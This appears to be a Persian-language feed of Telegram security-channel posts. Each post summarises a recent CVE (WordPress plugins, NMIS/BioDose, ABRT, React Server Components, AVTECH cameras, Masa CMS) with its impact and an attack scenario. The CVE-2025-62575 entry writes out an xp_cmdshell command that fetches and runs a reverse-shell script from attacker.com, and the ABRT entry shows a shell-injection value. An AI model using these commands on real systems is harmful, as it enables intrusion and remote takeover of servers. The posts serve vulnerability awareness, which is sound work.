🚨 New Vulnerability Alert: CVE-2025-13542

🔴 Risk Level: CRITICAL (Score: 9.8)

📜 شرح آسیب‌پذیری:

یک آسیب‌پذیری از نوع ارتقاء سطح دسترسی (Privilege Escalation) با شناسه CVE-2025-13542 در افزونه وردپرسی DesignThemes LMS شناسایی شده است. این ضعف امنیتی تمام نسخه‌های این افزونه تا نسخه 1.0.4 (و شامل آن) را تحت تأثیر قرار می‌دهد.

علت اصلی این آسیب‌پذیری، عدم اعتبارسنجی صحیح نقش کاربری (Role) در تابع dtlms_register_user_front_end است. این تابع که مسئول فرآیند ثبت‌نام کاربران جدید در بخش عمومی سایت است، به کاربران اجازه می‌دهد تا هنگام ثبت‌نام، هر نقشی را برای حساب خود انتخاب کنند، بدون اینکه محدودیتی برای آن وجود داشته باشد.

💥 میزان تأثیر:

مهاجم غیر احراز هویت شده (unauthenticated) - یعنی هر بازدیدکننده‌ای بدون نیاز به داشتن حساب کاربری - می‌تواند با ثبت یک حساب کاربری جدید، به صورت مستقیم به خود نقش مدیر کل (Administrator) را اختصاص دهد.

این امر به مهاجم کنترل کامل و مطلق بر روی وب‌سایت را می‌دهد. پیامدهای این حمله می‌تواند شامل موارد زیر باشد:

- نصب افزونه‌های مخرب و بدافزار
- تغییر محتوای کل سایت (Defacement)
- سرقت اطلاعات حساس کاربران و پایگاه داده
- حذف کامل وب‌سایت و اطلاعات آن

این آسیب‌پذیری به دلیل سهولت در بهره‌برداری و تأثیر بسیار بالا، دارای درجه حساسیت بحرانی (Critical) است.

🎭 سناریوی حمله:

۱. مهاجم یک وب‌سایت را که از نسخه آسیب‌پذیر افزونه DesignThemes LMS استفاده می‌کند، شناسایی می‌کند.

۲. مهاجم به صفحه ثبت‌نام عمومی وب‌سایت مراجعه می‌کند.

۳. هنگام پر کردن فرم ثبت‌نام، مهاجم با دستکاری درخواست ارسالی به سرور (به‌عنوان مثال با استفاده از ابزاری مانند Burp Suite)، پارامتری را برای تعیین نقش کاربری به صورت 'role' : 'administrator' به درخواست خود اضافه می‌کند.

۴. از آنجایی که تابع مربوطه در سمت سرور هیچ‌گونه بررسی برای نقش درخواستی انجام نمی‌دهد، درخواست را پردازش کرده و یک حساب کاربری جدید با سطح دسترسی مدیر کل برای مهاجم ایجاد می‌کند.

۵. مهاجم اکنون می‌تواند با اطلاعات حساب کاربری جدید خود وارد پنل مدیریت وردپرس شده و کنترل کامل سایت را در دست بگیرد.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-61940

🟠 Risk Level: HIGH (Score: 8.3)

📝 شرح آسیب‌پذیری:

آسیب‌پذیری با شناسه CVE-2025-61940 در نرم‌افزار NMIS/BioDose نسخه V22.02 و قدیمی‌تر شناسایی شده است. این ضعف امنیتی ناشی از یک معماری نامناسب در مدیریت دسترسی به پایگاه داده است. در این نسخ، تمامی ارتباطات نرم‌افزار با پایگاه داده (SQL Server) از طریق یک حساب کاربری مشترک و با سطح دسترسی بالا انجام می‌شود.

اگرچه کاربران برای ورود به نرم‌افزار کلاینت، فرآیند احراز هویت با رمز عبور را طی می‌کنند، اما این کنترل دسترسی تنها در سطح خودِ اپلیکیشن اعمال می‌شود. اتصال اصلی به پایگاه داده، فارغ از هویت کاربر وارد شده، همواره با همان حساب کاربری قدرتمند و مشترک برقرار می‌گردد. این موضوع اصل «حداقل دسترسی لازم» یا Principle of Least Privilege را نقض می‌کند.

---

💥 تاثیر:

تاثیر اصلی این آسیب‌پذیری، دور زدن کامل کنترل‌های دسترسی در سطح اپلیکیشن است. یک مهاجم که بتواند به هر نحوی به لایه ارتباطی بین کلاینت و پایگاه داده دسترسی پیدا کند، می‌تواند با سوءاستفاده از این اتصال مشترک، به تمامی اطلاعات موجود در دیتابیس دسترسی پیدا کند، آن‌ها را تغییر دهد یا حذف کند.

پیامدهای بالقوه عبارتند از:
• نشت کامل اطلاعات (Full Data Breach): دسترسی غیرمجاز به تمامی داده‌های حساس ذخیره شده.
• از دست رفتن یکپارچگی داده‌ها (Data Integrity Loss): امکان دستکاری و تغییر اطلاعات مهم.
• ارتقاء سطح دسترسی (Privilege Escalation): یک کاربر با دسترسی محدود در اپلیکیشن می‌تواند به سطح دسترسی کامل در پایگاه داده برسد.

---

🎭 سناریو:

یک سناریوی محتمل برای بهره‌برداری از این آسیب‌پذیری به شرح زیر است:

یک مهاجم داخلی (Insider Threat) یا یک مهاجم خارجی که موفق به نفوذ به شبکه داخلی سازمان شده است، ترافیک شبکه بین کلاینت NMIS/BioDose و سرور پایگاه داده را شنود (Sniff) می‌کند. با تحلیل ترافیک، مهاجم به راحتی می‌تواند اطلاعات مربوط به رشته اتصال (Connection String) را که حاوی نام کاربری و رمز عبور حساب مشترک SQL است، استخراج کند.

پس از به دست آوردن این اطلاعات، مهاجم دیگر نیازی به تعامل با اپلیکیشن کلاینت ندارد. او می‌تواند مستقیماً و با استفاده از ابزارهای مدیریت پایگاه داده (مانند SQL Server Management Studio)، به دیتابیس متصل شده و به دلیل سطح دسترسی بالای حساب کاربری مشترک، هرگونه عملیاتی را بدون هیچ محدودیتی بر روی داده‌ها انجام دهد. این حمله کاملاً از دید لاگ‌های اپلیکیشن پنهان می‌ماند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-62575

🟠 Risk Level: HIGH (Score: 8.3)

🔬 شرح آسیب‌پذیری:

آسیب‌پذیری با شناسه CVE-2025-62575 در نرم‌افزار NMIS/BioDose نسخه‌های V22.02 و قدیمی‌تر شناسایی شده است. ریشه این مشکل در پیکربندی ناامن و پیش‌فرض پایگاه داده Microsoft SQL Server است که توسط این نرم‌افزار استفاده می‌شود.

به طور مشخص، حساب کاربری پایگاه داده با نام nmdbuser (و سایر حساب‌های ایجاد شده به صورت پیش‌فرض) دارای نقش sysadmin است. این نقش، بالاترین سطح دسترسی در SQL Server محسوب می‌شود و به این حساب کاربری اجازه انجام هرگونه عملیاتی را بر روی سرور پایگاه داده می‌دهد. اعطای چنین دسترسی بالایی به یک حساب کاربری اپلیکیشن، یک نقص امنیتی جدی و برخلاف اصل «حداقل دسترسی لازم» (Principle of Least Privilege) است.

💥 تأثیر:

خطرناک‌ترین پیامد این آسیب‌پذیری، امکان اجرای کد از راه دور (Remote Code Execution - RCE) بر روی سرور میزبان پایگاه داده است. یک مهاجم که به هر نحوی به اطلاعات ورود این حساب کاربری دست یابد، می‌تواند با سوءاستفاده از دسترسی sysadmin، دستورات دلخواه خود را بر روی سیستم‌عامل سرور اجرا کند.

این امر می‌تواند منجر به سناریوهای فاجعه‌باری از جمله کنترل کامل سرور، سرقت یا تخریب داده‌های حساس، نصب بدافزار و باج‌افزار، و یا استفاده از سرور قربانی به عنوان نقطه‌ای برای نفوذ به سایر بخش‌های شبکه داخلی سازمان گردد.

🎭 سناریوی حمله:

یک سناریوی حمله محتمل می‌تواند به شکل زیر باشد:

۱. مهاجم از طریق یک ضعف دیگر (مانند یک آسیب‌پذیری SQL Injection در برنامه) یا با به دست آوردن اطلاعات ورود حساب nmdbuser از طریق روش‌های دیگر، به پایگاه داده متصل می‌شود.

۲. پس از اتصال، مهاجم به دلیل داشتن دسترسی sysadmin، قادر است تا رویه‌های ذخیره‌شده (Stored Procedures) سیستمی و قدرتمند مانند xp_cmdshell را که به طور پیش‌فرض ممکن است غیرفعال باشند، فعال‌سازی کند.

۳. سپس، مهاجم از این رویه برای اجرای دستورات در خط فرمان سیستم‌عامل سرور استفاده می‌کند. برای مثال، با اجرای یک دستور ساده می‌تواند یک اسکریپت مخرب (Payload) را از سرور خود دانلود و بر روی سرور قربانی اجرا نماید:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(\'https://attacker.com/reverse_shell.ps1\')"'

۴. با اجرای این دستور، یک ارتباط معکوس (Reverse Shell) با سرور مهاجم برقرار شده و کنترل کامل سیستم‌عامل سرور در اختیار او قرار می‌گیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-64298

🟠 Risk Level: HIGH (Score: 8.4)

گزارش تحلیل آسیب‌پذیری
CVE-2025-64298

---

شرح آسیب‌پذیری:

آسیب‌پذیری با شناسه CVE-2025-64298 در نرم‌افزار NMIS/BioDose نسخه V22.02 و قدیمی‌تر شناسایی شده است. این مشکل مربوط به نصب‌هایی است که از نسخه تعبیه‌شده Microsoft SQL Server Express استفاده می‌کنند.

به‌طور پیش‌فرض، دایرکتوری اشتراک‌گذاری شده در ویندوز (Windows share) که برای دسترسی کلاینت‌ها در شبکه‌های نصب‌شده استفاده می‌شود، دارای مجوزهای دسترسی ناامن است. این ضعف امنیتی به کاربران غیرمجاز در شبکه اجازه می‌دهد تا به فایل‌های پایگاه داده SQL Server و فایل‌های پیکربندی که ممکن است حاوی اطلاعات حساس باشند، دسترسی پیدا کنند.

---

تاثیر:

بهره‌برداری موفقیت‌آمیز از این آسیب‌پذیری می‌تواند منجر به عواقب جدی امنیتی شود:

نشت اطلاعات حساس: مهاجمان می‌توانند به فایل‌های پایگاه داده و پیکربندی دسترسی پیدا کرده و اطلاعات محرمانه مانند داده‌های کاربران، تنظیمات سیستم و اسرار تجاری را استخراج کنند.

نقض تمامیت داده‌ها: با دسترسی به فایل‌های پایگاه داده، امکان تغییر یا حذف داده‌ها وجود دارد که می‌تواند عملکرد نرم‌افزار را مختل کرده و به اعتبار داده‌ها آسیب بزند.

افزایش سطح دسترسی: در صورتی که فایل‌های پیکربندی حاوی اطلاعات اعتبارسنجی (مانند رمزهای عبور با هش ضعیف) باشند، مهاجم می‌تواند از آن‌ها برای دسترسی به سایر بخش‌های سیستم یا شبکه استفاده کند.

---

سناریو:

یک مهاجم با دسترسی اولیه به شبکه داخلی سازمان، شروع به اسکن شبکه‌های اشتراک‌گذاری شده (shares) می‌کند.

مهاجم دایرکتوری ناامن مربوط به نصب NMIS/BioDose را کشف می‌کند که به دلیل مجوزهای ضعیف، برای همه کاربران شبکه قابل خواندن است.

سپس، فایل‌های پایگاه داده (با پسوند .mdf) و فایل‌های پیکربندی را به سیستم خود کپی می‌کند.

در محیطی آفلاین و امن، مهاجم پایگاه داده را به یک نمونه SQL Server متصل کرده و تمام جداول و داده‌های حساس موجود در آن را استخراج می‌کند. این اطلاعات می‌تواند برای حملات بعدی یا فروش در بازار سیاه مورد استفاده قرار گیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-13486

🔴 Risk Level: CRITICAL (Score: 9.8)

تحلیل آسیب‌پذیری: CVE-2025-13486
اجرای کد از راه دور در پلاگین ACF: Extended وردپرس

---

شرح آسیب‌پذیری:
یک آسیب‌پذیری حیاتی از نوع اجرای کد از راه دور (RCE) با شناسه CVE-2025-13486 در پلاگین Advanced Custom Fields: Extended برای وردپرس شناسایی شده است. این ضعف امنیتی نسخه‌های 0.9.0.5 تا 0.9.1.1 را تحت تأثیر قرار می‌دهد.

آسیب‌پذیری ناشی از تابع prepare_form() است که ورودی دریافت شده از کاربر را بدون اعتبارسنجی و پاک‌سازی کافی، مستقیماً به تابع call_user_func_array() ارسال می‌کند. این امر به مهاجمان احراز هویت نشده اجازه می‌دهد تا با ارسال درخواست‌های دستکاری‌شده، کد دلخواه خود را بر روی سرور اجرا کنند.

تأثیر:
موفقیت‌آمیز بودن این حمله می‌تواند منجر به کنترل کامل وب‌سایت و سرور میزبان شود. برخی از اثرات کلیدی عبارتند از:

- اجرای کد دلخواه: مهاجم می‌تواند هر دستوری را روی سرور اجرا کند.
- نصب Backdoor: امکان نصب درب‌های پشتی (Backdoor) برای حفظ دسترسی پایدار به سیستم.
- ایجاد کاربر مدیر: مهاجم قادر به ایجاد حساب‌های کاربری جدید با سطح دسترسی مدیر (Administrator) خواهد بود.
- سرقت اطلاعات: دسترسی کامل به پایگاه داده، فایل‌های وب‌سایت و اطلاعات حساس کاربران.
- تخریب وب‌سایت: امکان تغییر محتوا، حذف اطلاعات یا از دسترس خارج کردن کامل سایت.

سناریو:
یک مهاجم، وب‌سایتی را که از نسخه آسیب‌پذیر پلاگین ACF: Extended استفاده می‌کند، شناسایی می‌کند. سپس، یک درخواست HTTP خاص و دستکاری‌شده را به سمت سرور ارسال می‌کند. این درخواست حاوی یک Payload مخرب است که تابع prepare_form() را هدف قرار می‌دهد.

تابع آسیب‌پذیر، این Payload را به عنوان ورودی معتبر پذیرفته و آن را به call_user_func_array() پاس می‌دهد. در نتیجه، کد مخرب تعبیه‌شده توسط مهاجم (مثلاً یک دستور برای ایجاد یک فایل PHP جهت آپلود فایل‌های دیگر یا ایجاد یک کاربر مدیر جدید) بر روی سرور اجرا می‌شود. پس از این مرحله، مهاجم کنترل کاملی بر روی وب‌سایت خواهد داشت بدون آنکه نیاز به هیچ‌گونه نام کاربری یا رمز عبوری داشته باشد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-12744

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل آسیب‌پذیری CVE-2025-12744
افزایش سطح دسترسی از طریق تزریق دستور در ABRT

📝 توضیحات آسیب‌پذیری:
یک نقص امنیتی حیاتی در دیمن `ABRT` در نحوه پردازش اطلاعات `mount` که از سوی کاربر ارائه می‌شود، شناسایی شده است. این سرویس تا ۱۲ کاراکتر از ورودی غیرقابل اعتماد را کپی کرده و بدون اعتبارسنجی مناسب، آن را مستقیماً در یک دستور شل (docker inspect %s) قرار می‌دهد.

این ضعف در اعتبارسنجی ورودی به مهاجم اجازه می‌دهد تا متاکاراکترهای شل (Shell Metacharacters) را به دستور اصلی تزریق کرده و دستورات مخرب خود را اجرا نماید.

💥 تاثیر:
این آسیب‌پذیری از نوع تزریق دستور (Command Injection) است و پیامد اصلی آن افزایش سطح دسترسی (Privilege Escalation) می‌باشد.

یک کاربر محلی با دسترسی محدود می‌تواند با ساخت یک ورودی خاص، دستورات دلخواه خود را با سطح دسترسی کامل `root` بر روی سیستم اجرا کند و در نهایت کنترل کامل سیستم هدف را به دست آورد.

⚙️ سناریو:
یک مهاجم با یک حساب کاربری عادی در سیستم هدف، یک ورودی مخرب (مثلاً نام یک کانتینر یا شناسه مرتبط) را ایجاد می‌کند که حاوی دستورات شل باشد.

برای مثال، مهاجم یک ورودی مانند a;id>/tmp/p را ایجاد می‌کند.

هنگامی که سرویس `ABRT` تلاش می‌کند تا این ورودی را با دستور docker inspect a;id>/tmp/p پردازش کند، به دلیل وجود متاکاراکتر ;، سیستم‌عامل ابتدا دستور docker inspect a و سپس دستور id>/tmp/p را اجرا می‌کند. از آنجایی که `ABRT` با دسترسی `root` اجرا می‌شود، دستور `id` نیز با همین سطح دسترسی اجرا شده و خروجی آن (که uid=0(root) است) در فایل /tmp/p ذخیره می‌شود.

مهاجم می‌تواند با جایگزین کردن دستور `id` با دستورات پیچیده‌تر، مانند ایجاد یک reverse shell، به طور کامل به سیستم نفوذ کند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-13342

🔴 Risk Level: CRITICAL (Score: 9.8)

تحلیل آسیب‌پذیری: CVE-2025-13342
تغییر غیرمجاز تنظیمات وردپرس در افزونه Frontend Admin

---

Vulnerability Description:
آسیب‌پذیری با شناسه CVE-2025-13342 در افزونه Frontend Admin by DynamiApps برای وردپرس شناسایی شده است. تمام نسخه‌های این افزونه تا نسخه 3.28.20 (شامل این نسخه) تحت تأثیر این ضعف امنیتی قرار دارند.

این مشکل به دلیل عدم وجود بررسی‌های کافی برای سطح دسترسی کاربر (Insufficient Capability Checks) و اعتبارسنجی ضعیف ورودی‌ها در تابع ActionOptions::run() به وجود آمده است. این نقص به یک مهاجم احراز هویت نشده اجازه می‌دهد تا با ارسال داده‌های دستکاری‌شده از طریق فرم‌های عمومی که با این افزونه ساخته شده‌اند، گزینه‌های حیاتی وردپرس را به‌صورت غیرمجاز تغییر دهد.

Impact:
تأثیر اصلی این آسیب‌پذیری، دادن کنترل بر تنظیمات کلیدی هسته وردپرس به مهاجم است. این امر می‌تواند منجر به سناریوهای خطرناکی از جمله تصاحب کامل وب‌سایت (Full Site Takeover) شود.

مهاجم می‌تواند گزینه‌های زیر را تغییر دهد:
▪️ users_can_register: فعال‌سازی قابلیت ثبت‌نام عمومی کاربران در سایت.
▪️ default_role: تعیین نقش کاربری پیش‌فرض برای کاربران جدید (مثلاً تغییر آن به Administrator).
▪️ admin_email: تغییر ایمیل مدیر اصلی سایت که می‌تواند به قفل شدن مدیر واقعی و فرآیند بازنشانی رمز عبور برای مهاجم منجر شود.

ترکیب این موارد به مهاجم اجازه می‌دهد تا یک حساب کاربری با سطح دسترسی مدیر برای خود ایجاد کرده و کنترل کامل سایت را در دست بگیرد.

Scenario:
یک سناریوی حمله محتمل به شرح زیر است:

۱. مهاجم یک وب‌سایت وردپرسی را پیدا می‌کند که از نسخه آسیب‌پذیر افزونه Frontend Admin استفاده کرده و یک فرم عمومی (مانند فرم ویرایش پروفایل یا فرم تماس) در دسترس عموم قرار دارد.

۲. مهاجم یک درخواست وب دستکاری‌شده (Crafted Request) به سمت سرور ارسال می‌کند. در این درخواست، پارامترهایی با نام‌های مشابه تنظیمات وردپرس مانند users_can_register با مقدار 1 و default_role با مقدار administrator گنجانده شده است.

۳. به دلیل ضعف امنیتی در افزونه، این درخواست بدون بررسی سطح دسترسی پردازش شده و مقادیر ارسال‌شده توسط مهاجم مستقیماً در جدول تنظیمات وردپرس (wp_options) بازنویسی می‌شود.

۴. اکنون، قابلیت ثبت‌نام در سایت فعال شده و نقش پیش‌فرض برای هر کاربر جدید، "مدیر کل" است. مهاجم به سادگی به صفحه ثبت‌نام سایت مراجعه کرده، یک حساب کاربری جدید ایجاد می‌کند و بلافاصله به پیشخوان وردپرس با بالاترین سطح دسترسی وارد می‌شود.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-13390

🔴 Risk Level: CRITICAL (Score: 10.0)


🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-55182

🔴 Risk Level: CRITICAL (Score: 10.0)

📝 شرح آسیب‌پذیری:
یک آسیب‌پذیری بسیار خطرناک از نوع اجرای کد از راه دور پیش از احراز هویت (Pre-Authentication RCE) با شناسه CVE-2025-55182 در کامپوننت‌های سرور React شناسایی شده است.

این ضعف امنیتی ناشی از deserialization ناامن داده‌های ورودی (payloads) از درخواست‌های HTTP به نقاط پایانی (endpoints) مربوط به Server Functionها می‌باشد. مهاجم می‌تواند بدون نیاز به هیچ‌گونه اعتبارسنجی، از این آسیب‌پذیری بهره‌برداری کند.

نسخه‌های تحت تأثیر:
19.0.0, 19.1.0, 19.1.1, 19.2.0

پکیج‌های آسیب‌پذیر:
react-server-dom-parcel
react-server-dom-turbopack
react-server-dom-webpack

💥 تأثیر:
یک مهاجم از راه دور و بدون نیاز به احراز هویت، قادر خواهد بود تا کد دلخواه خود را بر روی سرور آسیب‌پذیر اجرا کند. این امر می‌تواند منجر به کنترل کامل سرور (Full System Compromise)، سرقت اطلاعات حساس، اختلال در سرویس‌دهی و یا استفاده از سرور به عنوان نقطه‌ای برای حملات بیشتر به زیرساخت داخلی سازمان شود.

🎭 سناریو حمله:
مهاجم یک درخواست HTTP حاوی یک payload مخرب و با ساختار ویژه را به یکی از نقاط پایانی (endpoints) که از Server Functionها در یک وب اپلیکیشن آسیب‌پذیر استفاده می‌کند، ارسال می‌نماید. سرور، به دلیل پردازش و deserialization ناامن این محتوا، کد تعبیه‌شده توسط مهاجم را با سطح دسترسی پروسه وب اپلیکیشن اجرا می‌کند و کنترل اجرای برنامه را به دست مهاجم می‌سپارد.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-57198

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل و گزارش آسیب‌پذیری CVE-2025-57198

---

آسیب‌پذیری:
یک آسیب‌پذیری از نوع تزریق دستور (Command Injection) با شناسه CVE-2025-57198 در دستگاه‌های شرکت AVTECH SECURITY مدل DGM1104 با فریم‌ور FullImg-1015-1004-1006-1003 شناسایی شده است.

این ضعف امنیتی در اندپوینت Machine.cgi قرار دارد و به یک مهاجم که قبلاً به سیستم دسترسی پیدا کرده (Authenticated)، اجازه می‌دهد تا با ارسال ورودی‌های دستکاری‌شده، دستورات دلخواه خود را بر روی سیستم‌عامل دستگاه اجرا کند.

تأثیر:
مهاجم می‌تواند با بهره‌برداری موفق از این آسیب‌پذیری، کنترل کامل دستگاه را به دست آورد. این امر منجر به پیامدهای جدی زیر می‌شود:

- دسترسی و سرقت فیدهای ویدیویی زنده و ضبط‌شده.
- از کار انداختن کامل سیستم نظارتی.
- استفاده از دستگاه به عنوان نقطه‌ای برای نفوذ به سایر سیستم‌های موجود در شبکه داخلی (Lateral Movement).
- نصب بدافزار یا درب پشتی (Backdoor) برای حفظ دسترسی پایدار.

سناریوی حمله:
۱. مهاجم با استفاده از اطلاعات کاربری معتبر (مانند اطلاعات پیش‌فرض، ضعیف یا سرقت‌شده) به پنل وب دستگاه وارد می‌شود.

۲. سپس یک درخواست دستکاری‌شده به آدرس /cgi-bin/Machine.cgi ارسال می‌کند.

۳. در این درخواست، دستورات مخرب سیستم‌عامل (مانند ایجاد یک reverse shell برای برقراری ارتباط با سرور مهاجم) را در یکی از پارامترهای ورودی تزریق می‌کند.

۴. سرور بدون اعتبارسنجی کافی، ورودی مخرب را به همراه دستورات قانونی اجرا کرده و در نتیجه، مهاجم به اجرای کد از راه دور (RCE) دست می‌یابد و کنترل کامل دستگاه را در اختیار می‌گیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-57199

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل و گزارش آسیب‌پذیری CVE-2025-57199

---

🔎 شرح آسیب‌پذیری:

یک آسیب‌پذیری حیاتی با شناسه CVE-2025-57199 در دستگاه‌های AVTECH SECURITY Corporation DGM1104 با فریمور نسخه FullImg-1015-1004-1006-1003 شناسایی شده است.

این آسیب‌پذیری از نوع تزریق دستور پس از احراز هویت (Authenticated Command Injection) در فایل باینری NetFailDetectD می‌باشد. این بدان معناست که یک مهاجم معتبر (که قبلاً وارد سیستم شده) می‌تواند با ارسال ورودی‌های دستکاری‌شده، دستورات دلخواه خود را در سطح سیستم‌عامل دستگاه اجرا نماید.

⚠️ تأثیر:

تأثیر این آسیب‌پذیری بسیار بالا است. مهاجمی که با موفقیت از این ضعف امنیتی بهره‌برداری کند، می‌تواند کنترل کامل دستگاه را در دست بگیرد.

این سطح از دسترسی به مهاجم اجازه می‌دهد تا اطلاعات حساس را به سرقت ببرد، بدافزار یا درهای پشتی (Backdoors) نصب کند، عملکرد دستگاه را مختل سازد و یا از آن به عنوان نقطه‌ای برای حمله به سایر دستگاه‌های موجود در همان شبکه استفاده نماید.

🎬 سناریوی حمله:

یک مهاجم ابتدا از طریق روش‌هایی مانند فیشینگ، حملات Brute-force یا استفاده از اعتبارنامه‌های پیش‌فرض، به پنل مدیریتی دستگاه دسترسی پیدا می‌کند.

پس از ورود به سیستم، مهاجم یک درخواست دستکاری‌شده به بخشی که از باینری NetFailDetectD استفاده می‌کند، ارسال می‌نماید. این درخواست حاوی کاراکترهای ویژه‌ای مانند ; یا | است که به او اجازه می‌دهد دستور دلخواه خود را به ورودی اصلی اضافه کند. برای مثال، مهاجم می‌تواند دستوری برای ایجاد یک اتصال معکوس (Reverse Shell) به سرور خود اجرا کرده و بدین ترتیب کنترل کامل دستگاه را از راه دور به دست بگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-57201

🟠 Risk Level: HIGH (Score: 8.8)

گزارش تحلیل آسیب‌پذیری: CVE-2025-57201
---

توضیحات آسیب‌پذیری:

آسیب‌پذیری با شناسه CVE-2025-57201 در دستگاه‌های AVTECH SECURITY Corporation DGM1104 با فریمور نسخه FullImg-1015-1004-1006-1003 شناسایی شده است. این ضعف امنیتی از نوع تزریق دستور (Command Injection) بوده و در عملکرد سرور SMB دستگاه وجود دارد.

یک مهاجم که به سیستم دسترسی احرازهویت‌شده (Authenticated) داشته باشد، می‌تواند با ارسال یک ورودی دستکاری‌شده و مخرب، دستورات دلخواه خود را بر روی سیستم‌عامل دستگاه اجرا کند.

تأثیر:

تأثیر اصلی این آسیب‌پذیری بسیار بالا ارزیابی می‌شود. بهره‌برداری موفق از آن به مهاجم اجازه می‌دهد تا دستورات دلخواه را با سطح دسترسی پروسه در حال اجرا (احتمالاً root) بر روی دستگاه اجرا کند.

این امر می‌تواند منجر به پیامدهای زیر گردد:
- کنترل کامل دستگاه: مهاجم می‌تواند کنترل کامل دستگاه را به دست بگیرد.
- سرقت اطلاعات: دسترسی و استخراج داده‌های حساس ذخیره‌شده بر روی دستگاه یا در حال عبور از شبکه.
- نصب بدافزار: نصب انواع بدافزار مانند باج‌افزار، تروجان یا ابزارهای جاسوسی.
- حملات بعدی: استفاده از دستگاه آسیب‌دیده به عنوان نقطه‌ای برای حمله به سایر سیستم‌ها در شبکه داخلی (Pivoting).

سناریو:

یک سناریوی محتمل برای بهره‌برداری از این آسیب‌پذیری به شرح زیر است:

۱. دستیابی به اطلاعات ورود: مهاجم در ابتدا باید به اطلاعات ورود معتبر به پنل مدیریتی دستگاه دست پیدا کند. این کار می‌تواند از طریق روش‌هایی مانند حملات Brute-force روی رمزهای عبور ضعیف، فیشینگ یا استفاده از اطلاعات ورود پیش‌فرض (در صورت عدم تغییر) انجام شود.

۲. ورود به سیستم: مهاجم با استفاده از اطلاعات به دست آمده، به سیستم وارد می‌شود.

۳. ارسال Payload مخرب: مهاجم به بخشی از پنل مدیریتی که با تنظیمات سرور SMB در ارتباط است (مانند نام اشتراک‌گذاری، مسیر فایل و...) مراجعه می‌کند. در یکی از فیلدهای ورودی، یک payload دستکاری‌شده که حاوی دستورات سیستم‌عامل است (برای مثال، دستوری برای ایجاد یک Reverse Shell) را وارد می‌کند.

۴. اجرای دستور: سیستم به دلیل عدم اعتبارسنجی صحیح ورودی، رشته مخرب را به عنوان یک دستور معتبر سیستم‌عامل تفسیر و اجرا می‌کند.

۵. کنترل سیستم: در این لحظه، دستور مهاجم اجرا شده و او به یک شل دسترسی پیدا می‌کند که به معنای در اختیار گرفتن کنترل کامل دستگاه است.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2024-32641

🔴 Risk Level: CRITICAL (Score: 9.8)

گزارش تحلیل آسیب‌پذیری: اجرای کد از راه دور در Masa CMS
CVE-2024-32641

🔎 شرح آسیب‌پذیری:
یک آسیب‌پذیری حیاتی از نوع اجرای کد از راه دور (RCE) در سیستم مدیریت محتوای Masa CMS شناسایی شده است. این ضعف امنیتی نسخه‌های قبل از 7.2.8، 7.3.13 و 7.4.6 را تحت تأثیر قرار می‌دهد.

نقطه ضعف اصلی در تابع addParam وجود دارد. این تابع، ورودی کاربر را از طریق پارامتری به نام criteria دریافت کرده و بدون اعتبارسنجی کافی، آن را به تابع دیگری به نام setDynamicContent ارسال می‌کند. تابع دوم این ورودی را ارزیابی و اجرا می‌کند. در نتیجه، یک مهاجم بدون نیاز به احراز هویت می‌تواند با استفاده از تگ مخصوص m، کدهای مخرب خود را تزریق و بر روی سرور اجرا نماید.

⚡️ تأثیر:
با توجه به این که آسیب‌پذیری از نوع RCE است و نیازی به احراز هویت ندارد، سطح خطر آن بسیار بالا (Critical) ارزیابی می‌شود. بهره‌برداری موفق از این حفره امنیتی به مهاجم اجازه می‌دهد تا:

- کنترل کامل سرور میزبان را به دست گیرد.
- به اطلاعات حساس مانند پایگاه داده‌ها، فایل‌های کاربران و اطلاعات محرمانه دسترسی پیدا کرده و آن‌ها را به سرقت ببرد.
- بدافزارهایی مانند باج‌افزار یا ماینر ارز دیجیتال را بر روی سرور نصب کند.
- از سرور آلوده به عنوان نقطه‌ای برای حمله به سایر سیستم‌های داخل شبکه استفاده نماید.

📜 سناریو:
یک مهاجم، وب‌سایتی را که از نسخه آسیب‌پذیر Masa CMS استفاده می‌کند، شناسایی می‌کند.

مهاجم یک درخواست HTTP دستکاری‌شده را به سمت سرور ارسال می‌کند. در این درخواست، پارامتر criteria حاوی یک پی‌لود (Payload) مخرب است که با تگ m ساخته شده. برای مثال، این پی‌لود می‌تواند دستوری برای دانلود و اجرای یک اسکریپت Reverse Shell از سرور تحت کنترل مهاجم باشد.

